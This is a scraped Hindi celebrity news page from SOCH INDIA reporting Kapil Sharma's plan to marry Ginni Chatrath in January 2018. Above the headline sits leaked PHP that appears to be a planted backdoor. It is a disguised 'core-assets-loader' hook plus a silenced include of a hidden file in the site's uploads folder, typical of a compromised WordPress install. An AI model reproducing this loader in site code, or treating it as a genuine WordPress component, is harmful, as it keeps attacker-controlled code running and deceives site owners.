add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); जानें कपिल शर्मा कब करने वाले हैं शादी – SOCH INDIA
Menu

मनोरंजन
जानें कपिल शर्मा कब करने वाले हैं शादी

nobanner

मशहूर कॉमेडियन के फैंस के लिए शनिवार की सुबह खुशी लेकर आई थी. मगर रविवार के सुबह के कपिल शर्मा के फैंस के लिए खुशी का डोज अभी पूरा नहीं हुआ है. जी हां! सोशल मीडिया पर अपनी गर्लफ्रेंड को दुनिया के सामने करने के बाद कपिल शर्मा ने और बड़ा खुलासा किया है. और इस बार कपिल ने अपनी शादी की बात जाहिर की है.
कपिल शर्मा अगले साल शुरुआत में करने वाले हैं शादी!
आपने बिलकुल सही पढ़ा… बॉम्बे टाईम्स को इंटरव्यू देते हुए कपिल शर्मा ने कहा, पता नहीं लोगों को मेरी ट्वीट पर विश्वास क्यों नहीं होता है. इसमें हैरानी वाली कौन सी बात है. हां मैं गिनी से शादी कर रहा हूं और वो मेरा का प्यार हैं. मैं 10 साल से जालंधर में अपने कॉलेज के दिनों में उन्हें जानता हूं. मैं स्टैंड-अप कॉमेडी करने के लिए उनके कॉलेज जाया करता था. मुझे उन्हें पहली बार देखने के साथ प्यार ही प्यार हो गया. मेरी मां गिनी को पसंद करती हैं.”
कपिल और गिनी अगले साल शादी करने का प्लान बना रहे हैं. कपिल ने पुष्टि की कि वो 2018 के जनवरी में शादी करने की उम्मीद करते हैं. कपिल ने कहा, ”मुझे पता है कि मैं अपने शो पर दीपिका पादुकोण और बाकी एक्ट्रेसेस के साथ बहुत ‘छेड़खानी’ करता रहा हूं, लेकिन मुझे लगता है कि अब मेरे लिए सेटल होने का समय आ गया है. मुझे खुशी है कि मैं जिसे चाहता था वो मुझे मिल गई है.”
गिनी (भावनीत चतुर्थ) कॉमेडी शो ‘हंस बलिए’ में साल 2009 में दिखाई दीं थी. लेकिन गिनी ने स्टैंड-अप कॉमेडी के बजाय एमबीए करने का फैसला किया. इसके अलावा वह अपने पिता के बिज़नेस में उनकी मदद करती हैं.